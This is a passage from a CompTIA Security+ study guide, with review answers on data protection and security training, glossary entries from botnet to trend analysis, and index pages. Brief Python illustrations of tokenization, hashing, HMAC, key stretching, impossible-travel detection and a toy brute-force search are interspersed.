hobbyist site with a global audience. The site currently collects account details with no further
information. What should be added to be in compliance with data protection regulations?
The site should add a privacy notice explaining the purposes the personal information is collected and used
for. The form should provide a means for the user to give explicit and informed consent to this privacy
notice.
4. You are preparing a briefing paper for customers on the organizational consequences of data
and privacy breaches. You have completed sections for reputation damage, identity theft, and
IP theft. Following the CompTIA Security+ objectives, what other section should you add?
Data and privacy breaches can lead legislators or regulators to impose fines. In some cases, these fines can
be substantial (calculated as a percentage of turnover).
5. This state means that the data is in some sort of persistent storage media.
Data at rest. In this state, it is usually possible to encrypt the data, using techniques such as whole disk
encryption, database encryption, and file- or folder-level encryption.
6. This method of data protection is often associated with payment processing systems.
Tokenization. Tokenization replaces sensitive data (such as a credit card number) with a randomly generated
token while securely storing the original data in a separate location.
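The mechanism can be sketched as a toy token vault. This is purely illustrative; a real tokenization service adds access control, auditing, and often format-preserving tokens, and keeps the vault in a separately secured environment:

```python
import secrets

class TokenVault:
    """Toy tokenization vault: the card number never leaves the vault;
    downstream systems only ever see the random token."""

    def __init__(self):
        self._store = {}  # token -> original value (the "separate location")

    def tokenize(self, card_number: str) -> str:
        token = secrets.token_hex(8)  # random, carries no card data
        self._store[token] = card_number
        return token

    def detokenize(self, token: str) -> str:
        return self._store[token]

vault = TokenVault()
token = vault.tokenize("4111111111111111")
assert token != "4111111111111111"
assert vault.detokenize(token) == "4111111111111111"
```

Unlike encryption, there is no mathematical relationship between token and card number, so a stolen token is useless without access to the vault itself.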
7. You take an incident report from a user trying to access a REPORT.docx file on a SharePoint site.
The file has been replaced by a REPORT.docx.QUARANTINE.txt file containing a policy violation
notice. What is the most likely cause?
This is typical of a data loss prevention (DLP) policy replacing a file involved in a policy violation with a
tombstone file.
Review Activity: Importance of Personnel Policies
1. Your company has been the victim of several successful phishing attempts over the past year.
Attackers managed to steal credentials from these attacks and use them to compromise key
systems. What vulnerability contributed to the success of these social engineers, and why?
A lack of proper user training directly contributes to the success of social engineering attempts. Attackers
can easily trick users when those users are unfamiliar with the characteristics and ramifications of such
deception.
Employees have different levels of technical knowledge and different work priorities. This means that a "one
size fits all" approach to security training is impractical.
3. You are planning a security awareness program for a manufacturer. Is a pamphlet likely to be
an effective training tool on its own?
Using a diversity of training techniques will boost engagement and retention. Practical tasks, such as
phishing simulations, will give attendees more direct experience. Workshops or computer-based training will
make it easier to assess whether the training has been completed.
Glossary
botnet A group of hosts or devices that has been infected by a control program called a bot, which enables attackers to exploit the hosts to mount attacks.

bring your own device (BYOD) Security framework and tools to facilitate use of personally owned devices to access corporate networks and data.

brute force attack A type of password attack where an attacker uses an application to exhaustively try every possible alphanumeric combination to crack encrypted passwords.

buffer overflow An attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory. This can allow the attacker to crash the system or execute arbitrary code.

bug bounty Reward scheme operated by software and web services vendors for reporting vulnerabilities.

business continuity (BC) A collection of processes that enable an organization to maintain normal business operations in the face of some adverse event.

business email compromise (BEC) An impersonation attack in which the attacker gains control of an employee's account and uses it to convince other employees to perform fraudulent actions.

business impact analysis (BIA) Systematic activity that identifies organizational risks and determines their effect on ongoing, mission critical operations.

business partnership agreement (BPA) Agreement by two companies to work together closely, such as the partner agreements that large IT companies set up with resellers and solution providers.

cable lock Devices can be physically secured against theft using cable ties and padlocks. Some systems also feature lockable faceplates, preventing access to the power switch and removable drives.

caching engine A feature of many proxy servers that enables the servers to retain a copy of frequently requested web pages.

call list A document listing authorized contacts for notification and collaboration during a security incident.

canonicalization attack An attack method where input characters are encoded in such a way as to evade vulnerable input validation measures.

capacity planning A practice which involves estimating the personnel, storage, computer hardware, software, and connection infrastructure resources required over some future period of time.

card cloning Making a copy of a contactless access card.

cellular Standards for implementing data access over cellular networks are implemented as successive generations. For 2G (up to about 48 Kb/s) and 3G (up to about 42 Mb/s), there are competing GSM and CDMA provider networks. Standards for 4G (up to about 90 Mb/s) and 5G (up to about 300 Mb/s) are developed under converged LTE standards.

centralized computing architecture A model where all data processing and storage is performed in a single location.

certificate chaining A method of validating a certificate by tracing each CA that signs the certificate, up through the hierarchy to the root CA. Also referred to as chain of trust.

certificate revocation list (CRL) A list of certificates that were revoked before their expiration date.

certificate signing request (CSR) A Base64 ASCII file that a subject sends to a CA to get a certificate.

certification An asset disposal technique that relies on a third party to use sanitization or destruction methods for data remnant removal, and provides documentary evidence that the process is complete and successful.

chain of custody Record of handling evidence from collection to presentation in court to disposal.

change control The process by which the need for change is recorded and approved.
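The brute force attack entry can be illustrated with a short sketch. The six-character alphabet, three-character password length, and target value below are illustrative choices, not taken from the guide:

```python
import hashlib
from itertools import product

# Illustrative search space for the demo: a tiny alphabet and short length.
ALPHABET = "abc123"
# The defender stores only the hash; the attacker tries to match it.
target = hashlib.sha256(b"ba1").hexdigest()

def brute_force(target_hash: str, length: int = 3):
    """Exhaustively try every combination of ALPHABET of the given length."""
    for combo in product(ALPHABET, repeat=length):
        candidate = "".join(combo)
        if hashlib.sha256(candidate.encode()).hexdigest() == target_hash:
            return candidate
    return None

print(brute_force(target))  # recovers "ba1" after exhaustive search
```

Real attacks work the same way at vastly larger scale, which is why password length and character variety matter: each added character multiplies the search space.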
… and policies to transfer data without authorization or detection.

credential harvesting Social engineering techniques for gathering valid credentials to use to gain unauthorized access.

credential replay An attack that uses a captured authentication token to start an unauthorized session without having to discover the plaintext password for an account.

credentialed scan A scan that uses credentials, such as usernames and passwords, to take a deep dive during the vulnerability scan, which will produce more information while auditing the network.

crossover error rate A biometric evaluation factor expressing the point at which FAR and FRR meet, with a low value indicating better performance.

cross-site request forgery (CSRF) A malicious script hosted on the attacker's site that can exploit a session started on another site in the same browser.

cross-site scripting (XSS) A malicious script hosted on the attacker's site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site, circumventing the browser's security model of trusted zones.

cryptanalysis The science, art, and practice of breaking codes and ciphers.

cryptographic primitive A single hash function, symmetric cipher, or asymmetric cipher.

cryptography The science and practice of altering data to make it unintelligible to unauthorized parties.

cryptominer Malware that hijacks computer resources to create cryptocurrency.

cyber threat intelligence (CTI) The process of investigating, collecting, analyzing, and disseminating information about emerging threats and threat sources.

cybersecurity framework (CSF) Standards, best practices, and guidelines for effective security risk management. Some frameworks are general in nature, while others are specific to industry or technology types.

dark web Resources on the Internet that are distributed between anonymized nodes and protected from general access by multiple layers of encryption and routing.

dashboard A console presenting selected information in an easily digestible format, such as a visualization.

data acquisition In digital forensics, the method and tools used to create a forensically sound copy of data from a source device, such as system memory or a hard disk.

data at rest Information that is primarily stored on specific media, rather than moving from one medium to another.

data breach When confidential or private data is read, copied, or changed without authorization. Data breach events may have notification and reporting requirements.

data classification The process of applying confidentiality and privacy labels to information.

data controller In privacy regulations, the entity that determines why and how personal data is collected, stored, and used.

data custodian An individual who is responsible for managing the system on which data assets are stored, including being responsible for enforcing access control, encryption, and backup/recovery measures.

data exfiltration The process by which an attacker takes data that is stored inside of a private network and moves it to an external network.

data exposure A software vulnerability where an attacker is able to circumvent access controls and retrieve confidential or sensitive data from the file system or database.

data historian Software that aggregates and catalogs data from multiple sources within an industrial control system.
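The cryptographic primitive entry can be made concrete with the simplest primitive, a hash function. This sketch uses Python's standard hashlib; the two sample messages are illustrative:

```python
import hashlib

# A hash function is one kind of cryptographic primitive: a fixed-size,
# one-way digest of arbitrary input. A small change to the input produces
# a completely unrelated output.
d1 = hashlib.sha256(b"transfer $100").hexdigest()
d2 = hashlib.sha256(b"transfer $900").hexdigest()

print(len(d1))   # 64 hex characters = 256 bits, regardless of input size
print(d1 == d2)  # False: different inputs give unrelated digests
```

Primitives like this are building blocks; protocols such as TLS combine hash, symmetric, and asymmetric primitives to achieve confidentiality and integrity together.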
FTPS A type of FTP using TLS for confidentiality.

full disk encryption (FDE) Encryption of all data on a disk (including system files, temporary files, and the pagefile) can be accomplished via a supported OS, third-party software, or at the controller level by the disk device itself.

gap analysis An analysis that measures the difference between the current and desired states in order to help assess the scope of work included in a project.

geofencing Security control that can enforce a virtual boundary based on real-world geography.

geographic dispersion A resiliency mechanism where processing and data storage resources are replicated between physically distant sites.

geolocation The identification or estimation of the physical location of an object, such as a radar source, mobile phone, or Internet-connected computing device.

Global Positioning System (GPS) A means of determining a receiver's position on Earth based on information received from orbital satellites.

governance Creating and monitoring effective policies and procedures to manage assets, such as data, and ensure compliance with industry regulations and local, national, and global legislation.

governance board Senior executives and external stakeholders with responsibility for setting strategy and ensuring compliance.

governance committee Leaders and subject matter experts with responsibility for defining policies, procedures, and standards within a particular domain or scope.

group account A collection of user accounts that is useful when establishing file permissions and user rights, because when many individuals need the same level of access, a group can be established containing all the relevant users.

group policy object (GPO) On a Windows domain, a way to deploy per-user and per-computer settings such as password policy, account restrictions, firewall status, and so on.

guidelines Best practice recommendations and advice for configuration items where detailed, strictly enforceable policies and standards are impractical.

hacker Often used to refer to someone who breaks into computer systems or spreads viruses; ethical hackers prefer to think of themselves as experts on and explorers of computer security systems.

hacktivist A threat actor that is motivated by a social issue or political cause.

hard authentication token An authentication token generated by a cryptoprocessor on a dedicated hardware device. As the token is never transmitted directly, this implements an ownership factor within a multifactor authentication scheme.

hardening A process of making a host or app configuration secure by reducing its attack surface, through running only necessary services, installing monitoring software to protect against malware and intrusions, and establishing a maintenance schedule to ensure the system is patched to be secure against software exploits.

hash-based message authentication code (HMAC) A method used to verify both the integrity and authenticity of a message by combining a cryptographic hash of the message with a secret key.

hashing A function that converts an arbitrary-length string input to a fixed-length string output. A cryptographic hash function does this in a way that reduces the chance of collisions, where two different inputs produce the same output.

Health Insurance Portability and Accountability Act (HIPAA) US federal law that protects the storage, reading, modification, and transmission of personal healthcare data.

heat map In a Wi-Fi site survey, a diagram showing signal strength and channel utilization at different locations.
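The HMAC entry can be sketched with Python's standard hmac module. The key and message values are illustrative:

```python
import hashlib
import hmac

# HMAC combines a cryptographic hash with a secret key so that a recipient
# holding the same key can verify both integrity and authenticity.
key = b"shared-secret"          # illustrative key, not a real secret
message = b"amount=100&to=alice"

tag = hmac.new(key, message, hashlib.sha256).hexdigest()

def verify(key: bytes, message: bytes, tag: str) -> bool:
    """Recompute the tag and compare in constant time."""
    expected = hmac.new(key, message, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)

print(verify(key, message, tag))                   # True: untouched message
print(verify(key, b"amount=999&to=mallory", tag))  # False: tampered message
```

Note the constant-time comparison via hmac.compare_digest, which avoids leaking information about how many leading characters of the tag matched.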
heat map risk matrix A graphical table indicating the likelihood and impact of risk factors identified for a workflow, project, or department for reference by stakeholders.

heuristic A method that uses feature comparisons and likenesses rather than specific signature matching to identify whether the target of observation is malicious.

high availability (HA) A metric that defines how closely systems approach the goal of providing data availability 100% of the time while maintaining a high level of system performance.

honeypot A host (honeypot), network (honeynet), file (honeyfile), or credential/token (honeytoken) set up with the purpose of luring attackers away from assets of actual value and/or discovering attack strategies and weaknesses in the security configuration.

horizontal privilege escalation When a user accesses or modifies specific resources that they are not entitled to.

host-based firewall A software application running on a single host and designed to protect only that host.

host-based intrusion detection system (HIDS) A type of IDS that monitors a computer system for unexpected behavior or drastic changes to the system's state.

host-based intrusion prevention system (HIPS) Endpoint protection that can detect and prevent malicious activity via signature and heuristic pattern matching.

hot site A fully configured alternate processing site that can be brought online either instantly or very quickly after a disaster.

HTML5 VPN Using features of HTML5 to implement remote desktop/VPN connections via browser software (clientless).

human-machine interface (HMI) Input and output controls on a PLC to allow a user to configure and monitor the system.

human-readable data Information stored in a file type that human beings can access and understand using basic viewer software, such as documents, images, video, and audio.

hybrid cloud A cloud deployment that uses both private and public elements.

hybrid password attack An attack that uses multiple attack methods, including dictionary, rainbow table, and brute force attacks, when trying to crack a password.

identification The process by which a user account (and its credentials) is issued to the correct person. Sometimes referred to as enrollment.

identity and access management (IAM) A security process that provides identification, authentication, and authorization mechanisms for users, computers, and other entities to work with organizational assets like networks, operating systems, and applications.

identity provider In a federated network, the service that holds the user account and performs authentication.

IDS/IPS log A target for event data related to detection/prevention rules that have been configured for logging.

IEEE 802.1X A standard for encapsulating EAP communications over a LAN (EAPoL) or WLAN (EAPoW) to implement port-based authentication.

impact The severity of the risk if realized, as determined by factors such as the scope, value of the asset, or the financial impacts of the event.

impersonation Social engineering attack where an attacker pretends to be someone they are not.

implicit deny The basic principle of security stating that unless something has explicitly been granted access, it should be denied access.

impossible travel A potential indicator of malicious activity where authentication attempts are made from different geographical locations within a short timeframe.

incident An event that interrupts standard operations or compromises security policy.

incident response lifecycle Procedures and guidelines covering appropriate …
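The impossible travel entry lends itself to a minimal detection sketch. The 900 km/h speed threshold and the sample coordinates below are illustrative assumptions, not values from the guide:

```python
from math import asin, cos, radians, sin, sqrt

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometers."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = (sin((lat2 - lat1) / 2) ** 2
         + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2)
    return 2 * 6371 * asin(sqrt(a))  # 6371 km = mean Earth radius

def impossible_travel(loc1, loc2, hours_apart, max_kmh=900):
    """Flag a login pair that would require implausible travel speed."""
    return haversine_km(*loc1, *loc2) / hours_apart > max_kmh

# London login followed one hour later by a Sydney login: flagged.
print(impossible_travel((51.5, -0.1), (-33.9, 151.2), 1.0))  # True
# London then Paris three hours later: plausible.
print(impossible_travel((51.5, -0.1), (48.9, 2.4), 3.0))     # False
```

Real detection systems refine this with IP geolocation accuracy, VPN awareness, and per-user travel baselines, but the core test is the same speed calculation.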
… a remote server. IMAP4 utilizes TCP port number 143, while the secure version IMAPS uses TCP/993.

internet of things (IoT) Devices that can report state and configuration data and be remotely managed over IP networks.

Internet Protocol (IP) Network (Internet) layer protocol in the TCP/IP suite providing packet addressing and routing for all higher-level protocols in the suite.

Internet Protocol Security (IPSec) Network protocol suite used to secure data through authentication and encryption as the data travels across the network or the Internet.

internet relay chat (IRC) A group communications protocol that enables users to chat, send private messages, and share files.

intrusion detection system (IDS) A security appliance or software that analyzes data from a packet sniffer to identify traffic that violates policies or rules.

intrusion prevention system (IPS) A security appliance or software that combines detection capabilities with functions that can actively block attacks.

IP Flow Information Export (IPFIX) Standards-based version of the NetFlow framework.

isolation Removing or severely restricting communications paths to a particular device or system.

IT Infrastructure Library (ITIL) An IT best practice framework, emphasizing the alignment of IT Service Management (ITSM) with business needs. ITIL was first developed in 1989 by the UK government. ITIL 4 was released in 2019 and is now marketed by AXELOS.

jailbreaking Removes the protective seal and any OS-specific restrictions to give users greater control over the device.

JavaScript Object Notation (JSON) A file format that uses attribute-value pairs to define configurations in a structure that is easy for both humans and machines to read and consume.

journaling A method used by file systems to record changes not yet made to the file system in an object called a journal.

jump server A hardened server that provides access to other hosts.

Kerberos A single sign-on authentication and authorization service that is based on a time-sensitive, ticket-granting system.

key distribution center (KDC) A component of Kerberos that authenticates users and issues tickets (tokens).

key encryption key (KEK) In storage encryption, the private key that is used to encrypt the symmetric bulk media encryption key (MEK). This means that a user must authenticate to decrypt the MEK and access the media.

key exchange Any method by which cryptographic keys are transferred among users, thus enabling the use of a cryptographic algorithm.

key length Size of a cryptographic key in bits. Longer keys generally offer better security, but key lengths for different ciphers are not directly comparable.

key management system In PKI, procedures and tools that centralize generation and storage of cryptographic keys.

key risk indicator (KRI) The method by which emerging risks are identified and analyzed so that changes can be adopted to proactively avoid issues from occurring.

key stretching A technique that strengthens potentially weak input for cryptographic key generation, such as passwords or passphrases created by people, against brute force attacks.

keylogger Malicious software or hardware that can record user keystrokes.

kill chain A model developed by Lockheed Martin that describes …
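The key stretching entry maps directly onto PBKDF2, which is available in Python's standard hashlib. The salt and iteration count below are illustrative; production systems should follow current guidance for both:

```python
import hashlib

# Key stretching runs a human-chosen password through many hash
# iterations, making each brute force guess proportionally more expensive.
password = b"correct horse battery staple"  # illustrative passphrase
salt = b"16-byte-salt-val"                  # illustrative; use os.urandom(16)

key = hashlib.pbkdf2_hmac("sha256", password, salt, iterations=100_000)

print(len(key))  # 32 bytes: a stretched 256-bit key
```

An attacker now pays the cost of 100,000 hash operations per candidate password, while a legitimate login pays it only once.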
… that a threat actor can exploit to add malicious code to a package.

malware Software that serves a malicious purpose, typically installed without the user's consent (or knowledge).

Mandatory Access Control (MAC) An access control model where resources are protected by inflexible, system-defined rules. Resources (objects) and users (subjects) are allocated a clearance level (or label).

maneuver In threat hunting, the concept that threat actor and defender may use deception or counterattacking strategies to gain positional advantage.

master service agreement (MSA) A contract that establishes precedence and guidelines for any business documents that are executed between two parties.

maximum tolerable downtime (MTD) The longest period that a process can be inoperable without causing irrevocable business failure.

mean time between failures (MTBF) A metric for a device or component that predicts the expected time between failures.

mean time to repair/replace/recover (MTTR) A metric representing the average time taken for a device or component to be repaired, replaced, or otherwise recover from a failure.

Media Access Control filtering (MAC filtering) Applying an access control list to a switch or access point so that only clients with approved MAC addresses can connect to it.

Memorandum of Agreement (MoA) A legal document forming the basis for two parties to cooperate without a formal contract (a cooperative agreement). MOAs are often used by public bodies.

memorandum of understanding (MoU) Usually a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve the exchange of money.

memory injection A vulnerability that a threat actor can exploit to run malicious code with the same privilege level as the vulnerable process.

Message Digest Algorithm v5 (MD5) A cryptographic hash function producing a 128-bit output.

metadata Information stored or recorded as a property of an object, state of a system, or transaction.

microservice An independent, single-function module with well-defined and lightweight interfaces and operations. Typically this style of architecture allows for rapid, frequent, and reliable delivery of complex applications.

missing logs A potential indicator of malicious activity where events or log files are deleted or tampered with.

mission essential function (MEF) Business or organizational activity that is too critical to be deferred for anything more than a few hours, if at all.

mobile device management (MDM) Process and supporting technologies for tracking, controlling, and securing the organization's mobile infrastructure.

monitoring/asset tracking Enumeration and inventory processes and software that ensure physical and data assets comply with configuration and performance baselines, and have not been tampered with or suffered other unauthorized access.

multi-cloud A cloud deployment model where the cloud consumer uses multiple public cloud services.

multifactor authentication (MFA) An authentication scheme that requires the user to present at least two different factors as credentials; for example, something you know, something you have, something you are, something you do, and somewhere you are. Specifying two factors is known as "2FA."

nation state actor A type of threat actor that is supported by the resources of its host country's military and security services.

National Institute of Standards and Technology (NIST) Develops computer …
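The MD5 entry's 128-bit output can be confirmed with Python's hashlib. Note that while MD5 survives in legacy integrity checks, it is considered broken for security use because collisions can be generated deliberately:

```python
import hashlib

# MD5 always produces a 128-bit (16-byte) digest, whatever the input size.
digest = hashlib.md5(b"hello world").digest()

print(len(digest) * 8)  # 128 bits
```

For new designs, SHA-256 or stronger is the usual substitute; the API call is identical apart from the algorithm name.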
qualitative risk analysis The process of determining the probability of occurrence and the impact of identified risks by using logical reasoning when numeric data is not readily available.

quantitative risk analysis A numerical method that is used to assess the probability and impact of risk and measure the impact.

questionnaires In vendor management, structured means of obtaining consistent information, enabling more effective risk analysis and comparison.

race condition A software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer.

radio-frequency ID (RFID) A means of encoding information into passive tags, which can be energized and read by radio waves from a reader device.

ransomware Malware that tries to extort money from the victim by blocking normal operation of a computer and/or encrypting the victim's files and demanding payment.

reaction time The elapsed time between an incident occurring and a response being implemented.

real-time operating system (RTOS) A type of OS that prioritizes deterministic execution of operations to ensure consistent response for time-critical tasks.

reconnaissance The actions taken to gather information about an individual's or organization's computer systems and software. This typically involves collecting information such as the types of systems and software used, user account information, data types, and network configuration.

recovery An incident response process in which hosts, networks, and systems are brought back to a secure baseline configuration.

recovery point objective (RPO) The longest period that an organization can tolerate lost data being unrecoverable.

recovery time objective (RTO) The maximum time allowed to restore a system after a failure event.

redundancy Overprovisioning resources at the component, host, and/or site level so that there is failover to a working instance in the event of a problem.

regulated data Information that has storage and handling compliance requirements defined by national and state legislation and/or industry regulations.

remote access Infrastructure, protocols, and software that allow a host to join a local network from a physically remote location, or that allow a session on a host to be established over a network.

remote access Trojan (RAT) Malware that creates a backdoor remote administration channel to allow a threat actor to access and control the infected host.

Remote Authentication Dial-in User Service (RADIUS) AAA protocol used to manage remote and wireless authentication infrastructures.

remote code execution (RCE) A vulnerability that allows an attacker to transmit code from a remote host for execution on a target host, or a module that exploits such a vulnerability.

Remote Desktop Protocol (RDP) Application protocol for operating remote connections to a host using a graphical interface. The protocol sends screen data from the remote host to the client and transfers mouse and keyboard input from the client to the remote host. It uses TCP port 3389.

replay attack An attack where the attacker intercepts some authentication data and reuses it to try to reestablish a session.

replication Automatically copying data between two processing systems, either simultaneously on both systems (synchronous) or from a primary to a secondary location (asynchronous).

reporting A forensics process that summarizes significant contents of digital data using open, repeatable, and unbiased methods and tools.

representational state transfer (REST) A standardized, stateless architectural style used by web applications for communication and integration.

reputational threat intelligence Blocklists of known threat sources, such as malware signatures, IP address ranges, and DNS domains.

residual risk Risk that remains even after controls are put into place.

resilience The ability of a system or network to recover quickly from failure events with no or minimal manual intervention.

resource consumption A potential indicator of malicious activity where CPU, memory, storage, and/or network usage deviates from expected norms.

resource inaccessibility A potential indicator of malicious activity where a file or service resource that should be available is inaccessible.

resources/funding The ability of threat actors to draw upon funding to acquire personnel and tools, and to develop novel attack types.

responsibility matrix Identifies how responsibility for the implementation of security is shared between the customer and the cloud service provider (CSP) as applications, data, and workloads are transitioned into a cloud platform.

responsible disclosure program A process that allows researchers and reviewers to safely disclose vulnerabilities to a software developer.

responsiveness The ability of a system to process a task or workload within an acceptable amount of time.

reverse proxy A type of proxy server that protects servers from direct contact with client requests.

right to be forgotten Principle of regulated privacy data that protects the data subject's ability to request its deletion.

risk Likelihood and impact (or consequence) of a threat actor exercising a vulnerability.

risk acceptance The response of determining that a risk is within the organization's appetite and no countermeasures other than ongoing monitoring are needed.

risk analysis Process for qualifying or quantifying the likelihood and impact of a factor.

risk appetite A strategic assessment of what level of residual risk is acceptable for an organization.

risk assessment The process of identifying risks, analyzing them, developing a response strategy for them, and mitigating their future impact.

risk avoidance In risk mitigation, the practice of ceasing activity that presents risk.

risk deterrence In risk mitigation, the response of deploying security controls to reduce the likelihood and/or impact of a threat scenario.

risk exception Category of risk management that uses alternate mitigating controls to control an accepted risk factor.

risk exemption Category of risk management that accepts an unmitigated risk factor.

risk identification Within overall risk assessment, the specific process of listing sources of risk due to threats and vulnerabilities.

risk management The cyclical process of identifying, assessing, analyzing, and responding to risks.

risk mitigation The response of reducing risk to fit within an organization's willingness to accept risk.

risk owner An individual who is accountable for developing and implementing a risk response strategy for a risk documented in a risk register.

risk register A document highlighting the results of risk assessments in an easily comprehensible format (such as a "traffic light" grid). Its purpose is for department managers and technicians to understand risks associated with the workflows that they manage.

risk reporting A periodic summary of relevant information about a project's current risks. It provides a summarized overview of known risks, realized risks, and their impact on the organization.

risk threshold Boundary for types and/or levels of risk that can be accepted.

risk tolerance Determines the thresholds that separate different levels of risk.

risk transference In risk mitigation, the response of moving or sharing the responsibility of risk to another entity, such as by purchasing cybersecurity insurance.

role-based access control (RBAC) An access control model where resources are protected by ACLs that are managed by administrators and that provide user permissions based on job functions.

root cause analysis A technique used to determine the true cause of the problem that, when removed, prevents the problem from occurring again.

root certificate authority In PKI, a CA that issues certificates to intermediate CAs in a hierarchical structure.

rooting Gaining superuser-level access over an Android-based mobile device.

router firewall A hardware device that has the primary function of a router, but also has firewall functionality embedded into the router firmware.

rule-based access control A nondiscretionary access control technique that is based on a set of operational rules or restrictions to enforce a least privileges permissions policy.

rules of engagement (ROE) A definition of how a pen test will be executed and what constraints will be in place. This provides the pen tester with guidelines to consult as they conduct their tests so that they don't have to constantly ask management for permission to do something.

salt A security countermeasure that mitigates the impact of precomputed hash table attacks by adding a random value to ("salting") each plaintext input.

sandbox A computing environment that is isolated from a host system to guarantee that the environment runs in a controlled, secure fashion. Communication links between the sandbox and the host are usually completely prohibited so that malware or faulty software can be analyzed in isolation and without risk to the host.

sanitization The process of thoroughly and completely removing data from a storage medium so that file remnants cannot be recovered.

Sarbanes-Oxley Act (SOX) A law enacted in 2002 that dictates requirements for the storage and retention of documents relating to an organization's financial and business operations.

scalability Property by which a computing environment is able to gracefully fulfill its ever-increasing resource needs.

screened subnet A segment isolated from the rest of a private network by one or more firewalls that accepts connections from the Internet over designated ports.

Secure Access Service Edge (SASE) A networking and security architecture that provides secure access to cloud applications and services while reducing complexity. It combines security services like firewalls, identity and access management, and secure web gateway with networking services such as SD-WAN.

secure baseline Configuration guides, benchmarks, and best practices for deploying and maintaining a network device or application server in a secure state for its given role.

secure enclave CPU extensions that protect data stored in system memory so that an untrusted process cannot read it.

Secure File Transfer Protocol (SFTP) A secure version of the File Transfer Protocol that uses a Secure Shell (SSH) …
…alerting service for faults such as high temperature, chassis intrusion, and so on.

system/process audit An audit process with a wide scope, including assessment of supply chain, configuration, support, monitoring, and cybersecurity factors.

tabletop exercise A discussion of simulated emergency situations and security incidents.

tactics, techniques, and procedures (TTP) Analysis of historical cyberattacks and adversary actions.

technical debt Costs accrued by keeping an ineffective system or product in place, rather than replacing it with a better-engineered one.

Temporal Key Integrity Protocol (TKIP) The mechanism used in the first version of WPA to improve the security of wireless encryption mechanisms, compared to the flawed WEP standard.

test access point (TAP) A hardware device inserted into a cable run to copy frames for analysis.

tethering Using the cellular data plan of a mobile device to provide Internet access to a laptop or PC. The PC can be tethered to the mobile by USB, Bluetooth, or Wi-Fi (a mobile hotspot).

third party CA In PKI, a public CA that issues certificates for multiple domains and is widely trusted as a root trust by operating systems and browsers.

third-party risks Vulnerabilities that arise from dependencies in business relationships with suppliers and customers.

threat A potential for an entity to exercise a vulnerability (that is, to breach security).

threat actor A person or entity responsible for an event that has been identified as a security incident or as a risk.

threat feed Signatures and pattern-matching rules supplied to analysis platforms as an automated feed.

threat hunting A cybersecurity technique designed to detect the presence of threats that have not been discovered by normal security monitoring.

ticket granting ticket (TGT) In Kerberos, a token issued to an authenticated account to allow access to authorized application servers.

timeline In digital forensics, a tool that shows the sequence of file system events within a source image in a graphical format.

time-of-check to time-of-use (TOCTOU) The potential vulnerability that occurs when there is a change between when an app checked a resource and when the app used the resource.

time-of-day restrictions Policies or configuration settings that limit a user's access to resources.

tokenization A de-identification method where a unique token is substituted for real data.

trade secrets Intellectual property that gives a company a competitive advantage but hasn't been registered with a copyright, trademark, or patent.

transparent proxy A server that redirects requests and responses without the client being explicitly configured to use it. Also referred to as a forced or intercepting proxy.

Transport Layer Security (TLS) Security protocol that uses certificates for authentication and encryption to protect web communications and other application protocols.

Transport Layer Security virtual private network (TLS VPN) Virtual private networking solution that uses digital certificates to identify hosts and establish secure tunnels for network traffic.

transport/communication encryption Encryption scheme applied to data-in-motion, such as WPA, IPsec, or TLS.

trend analysis The process of detecting patterns within a dataset over time, and using those patterns to make predictions about future events or to better understand past events.
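The tokenization entry above can be illustrated with a minimal sketch. The token vault here is a plain in-memory dictionary and the token format is an assumption for illustration; production systems keep the vault in a hardened, access-controlled service.

```python
import secrets

# Minimal tokenization sketch: a random token is substituted for real
# data, and only the vault can map the token back to the original value.
vault = {}

def tokenize(value: str) -> str:
    token = secrets.token_hex(8)   # random token; reveals nothing about the data
    vault[token] = value           # real data stays inside the vault
    return token

def detokenize(token: str) -> str:
    return vault[token]            # authorized lookup only

card = "4111-1111-1111-1111"
token = tokenize(card)
print(token != card)               # True: the token is not derived from the data
print(detokenize(token) == card)   # True: the vault recovers the original
```

Unlike hashing, tokenization is reversible for authorized systems, and unlike encryption, the token has no mathematical relationship to the original value.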
Index
  potential for unauthorized access, 478
  public notification and disclosure, 478–479
data classifications, G-7, 472–473
  confidential (secret) data, 472
  critical (top secret) data, 472
  private/personal data, 472
  proprietary information, 472
  public (unclassified) data, 472
  restricted data, 473
  sensitive data, 473
  solutions, S-25
data compliance, 479–480
  assessments, 461
  contractual noncompliance, impacts of, 480
  monitoring, 481
  noncompliance, impacts of, 479
  obligations, in rules of engagement, 458
  reporting, 480–481
  scan, 366
  software licensing, 480
  solutions, S-25
  vendor diversity and, 193
  zero trust architectures and, 164
data controller, G-7, 475–476
data custodian, G-7, 423
data encryption key (DEK), 61
Data Encryption Standard (DES), 215
Data Execution Prevention (DEP), 221, 400
data exfiltration, G-7, 18, 387
data exposure, G-7, 321
data historian, G-7, 159
data in transit, G-8, 60, 482
data in use, G-8, 60, 482
data inventories, G-8, 477
data loss prevention (DLP), G-8, 269, 313, 365, 484–485
  alert only, 485
  block, 485
  endpoint agents, 484
  network agents, 484
  policy server, 484
  quarantine, 485
  tombstone, 485
data masking, G-8, 66
data owner, G-8, 423
data planes, G-8
  in software defined networking, 152, 153
  in zero trust architectures, 165–167
data processor, G-8, 60, 475–476, 482
data protection, 481–483
  authorities, 422
  cloud security considerations, 156
  data at rest, 481
  data in transit, 482
  data in use, 482
  database encryption, 481
  encryption, 294
  methods, 482–483
    encryption, 482
    geographic restrictions, 474, 482
    hashing, 482
    masking, 482
    obfuscation, 483
    permission restrictions, 483
    segmentation, 483
    tokenization, 483
  zero trust architectures, 164
Data Protection Act 2018, 418
data retention, G-8, 477
data sources, 347–357
  application logs, 351
  automated reports, 348
  dashboards, 347–348
  endpoint logs, 351
  host operating system logs, 349–350
  log data, 348–349
  metadata, 355–356
  network, 352–353
  packet captures, 354
  solutions, S-19
  vulnerability scans, 352
data subject, G-8, 475–476
data types, 470–471
  data type checks, 319
  financial data, 471
  human-readable data, 471
  legal data, 471
  non-human-readable data, 471
  regulated data, 470
  trade secrets, 471
database encryption, G-8, 62, 481
database management system (DBMS), 62
database mirroring, 178
database-level encryption, 62
datacenter security, 416
Datagram TLS (DTLS), 132
data/media encryption key (DEK/MEK), 278
DBMS. see database management system (DBMS)
dcfldd, 343
DCS. see distributed control system (DCS)
dd command, G-8, 343
DDoS. see distributed DoS (DDoS)
DDoS attacks. see distributed denial of service (DDoS) attacks
